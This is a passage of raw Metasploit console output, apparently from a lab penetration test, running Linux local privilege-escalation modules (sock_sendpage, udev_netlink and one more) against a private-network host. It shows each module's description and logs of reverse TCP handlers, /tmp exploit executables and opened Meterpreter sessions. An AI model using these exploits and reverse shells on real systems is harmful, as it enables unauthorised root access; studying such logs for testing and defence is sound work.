http://cvedetails.com/cve/2011-1485/ https://www.exploit-db.com/exploits/17942 http://www.osvdb.org/72261 Started reverse TCP handler on 192.168.26.132:4444 Writing exploit executable to /tmp/ZLAbtXFF (4346 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Starting the payload handler... Meterpreter session 5 opened (192.168.26.132:4444 -> 192.168.26.134:34367) at 2016-05-31 16:59:15 +0100 Session 5 created in the background.
36.  
37. PostExploit: exploit/linux/local/sock_sendpage Name: Linux Kernel Sendpage Local Privilege Escalation Module: exploit/linux/local/sock_sendpage Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-08-13 Provided by: Tavis Ormandy Julien Tinnes spender rcvalle egypt Available targets: Id Name -- ---- 0 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4 References: http://cvedetails.com/cve/2009-2692/ http://www.osvdb.org/56992 http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html Started reverse TCP handler on 192.168.26.132:4444 Writing exploit executable to /tmp/Zd6rJIzA (4069 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 6 opened (192.168.26.132:4444 -> 192.168.26.134:34368) at 2016-05-31 16:59:38 +0100 Session 6 created in the background.
38.  
39. PostExploit: exploit/linux/local/udev_netlink Name: Linux udev Netlink Local Privilege Escalation Module: exploit/linux/local/udev_netlink Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-04-16 Provided by: kcope Jon Oberheide egypt Available targets: Id Name -- ---- 0 Linux x86 1 Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. References: http://cvedetails.com/cve/2009-1185/ http://www.osvdb.org/53810 http://www.securityfocus.com/bid/34536 Started reverse TCP handler on 192.168.26.132:4444 Attempting to autodetect netlink pid... Meterpreter session, using get_processes to find netlink pid udev pid: 2341 Found netlink pid: 2340 Writing payload executable (155 bytes) to /tmp/lePgIJrQQu Writing exploit executable (1879 bytes) to /tmp/LLxUGIieWE chmod'ing and running it... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 7 opened (192.168.26.132:4444 -> 192.168.26.134:34369) at 2016-05-31 17:00:04 +0100 Session 7 created in the background.